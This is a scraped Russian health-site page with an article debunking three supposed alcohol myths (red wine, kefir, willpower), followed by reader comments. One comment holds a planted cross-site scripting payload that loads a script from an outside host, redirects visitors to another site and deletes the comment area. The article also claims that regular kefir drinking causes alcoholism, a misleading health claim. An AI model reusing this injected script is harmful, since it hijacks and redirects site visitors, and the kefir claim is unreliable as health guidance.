Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы про алкоголь  >>  Мифы про алкоголь
 
Обратная связь
 

Мифы про алкоголь

Размер шрифта
06 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Какие утверждения не соответствуют действительности.

 1

Миф 1 – Красное вино полезно.

Красное вино вредно для сердечно-сосудистой системы точно также, как и другой алкоголь. Клинические исследования американских ученых не нашли никаких доказательств мифа о том, будто бокал красного вина полезен для сердца. Этот миф основан на том, что жители тех стран, где употребление красного вина входит в традиционный рацион, меньше страдают заболеваниями сердца и сосудов.

Но, согласно исследованию американского кардиолога Гольдберга, это связано с тем, что в традиционный рацион питания входит не только красное вино, но и значительное количество овощей и фруктов, при незначительном количестве молочной продукции. Кроме того предполагалось, что красное вино, расширяя сосуды, тем самым защищает сердце. Но исследования показали, что оно неэффективно.

Миф 2 - Кефир не приводит к алкоголизму.

В кефире, благодаря спиртовому брожению молока с участием кефирных грибков, содержится алкоголь. Доля этилового спирта в этом напитке невелика – около 1%. Но и такое количество алкоголя опасно для здоровья, особенно детского. Детям до года кефир противопоказан, да и взрослым лучше быть аккуратным с этим напитком, ведь стакан кефира содержит фактически 4 мл водки. При постоянном употреблении кефира, организм привыкает к поступлению алкоголя и так развивается алкоголизм.

1

Миф 3 – Сила воли победит алкоголизм.

Болезни не лечатся силой воли, а алкоголизм – это болезнь. Алкоголь вызывает как психическую, так и физическую зависимость. Психологическая зависимость проявляется в постоянных мыслях о спиртном, подъёме настроения в предвкушении выпивки, чувстве неудовлетворённости в трезвом состоянии. Физическая зависимость от алкоголя появляется чуть позже психологической. На этой стадии, человек уже не сможет резко оборвать употребления алкоголя, иначе может быть абстинентный синдром – тошнота, рвота, отсутствие аппетита, бессонница, головокружение, головная боль, боль в областях сердца и печени. Для того чтобы преодолеть зависимости человеку необходима не только сила воли, но и помощь квалифицированных специалистов.



Сюжеты по теме:
Мифы про алкоголь. Каким утверждениями не стоит верить

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

06 февраля 2012 в 14:45

Цитировать   |   Пожаловаться

чтобы бросить пить или курить, надо только очень захотеть! Тому много примеров из близкого окружения!

2 - Гость

07 февраля 2012 в 07:25

Цитировать   |   Пожаловаться

Вообще, непонятно, чему верить? Порой эта программа противоречит сама себе. Например, как-то рассказывали о пользе кефира, полученного сквашиванием молока тибетским кефирным грибом и говорили "пейте на здоровье". Тут пишут, что от кефир может привести к алкоголизму. Иили, говороили, что морепродукты полезны для сердечно-сосудистой системы, и при этом в одной из программ говорится, что кревертки богаты вредоносной фракцией холестерина (ЛПНП). Если так посмотреть, то, как говорится "жить вредно - от этого умирают". Где логика, господа? Проясните, если сможете.

3 - Гость

07 февраля 2012 в 07:37

Цитировать   |   Пожаловаться

Кстати, могу добавить, что уже 2 года пью напиток, полученный на тибетском молочном грибе. Бывали перерывы от его приема  - от 2 недель до месяца, и никакой зависимости. Так, что тут есть что поставить под сомнение.  

Гость 07 февраля 2012 в 07:25
кефир может привести к алкоголизму
 Если вы пересмотрите сюжет, то заметите, что кефир не рекомендуется детям только первого года жизни. Всем, кто старше, привычка к приему алкоголя не угрожает, пейте на здоровье. 

5 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Оживаем после нового года без лекарств   Мифы об алкоголе   Лучшая еда и напитки при похмелье   Этот сок – лучший для похмелья!  
11 апреля 2013Каждая 30-я смерть от рака из-за водки 12 августа 2011Только четверть россиян не пьет
 
27 июля 2011В Москве за полгода от запоев погибли более 1000 человек 18 июля 2011Подростковое пьянство опаснее для девочек
 

Слайдшоу

1
Алкогольные напитки, которые заставят вас потолстеть!
Как студенческая жизнь влияет на здоровье
Как сохранить эрекцию мужа

Тесты

1
Есть ли у вас остеопороз?
Что вы знаете о цистите?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.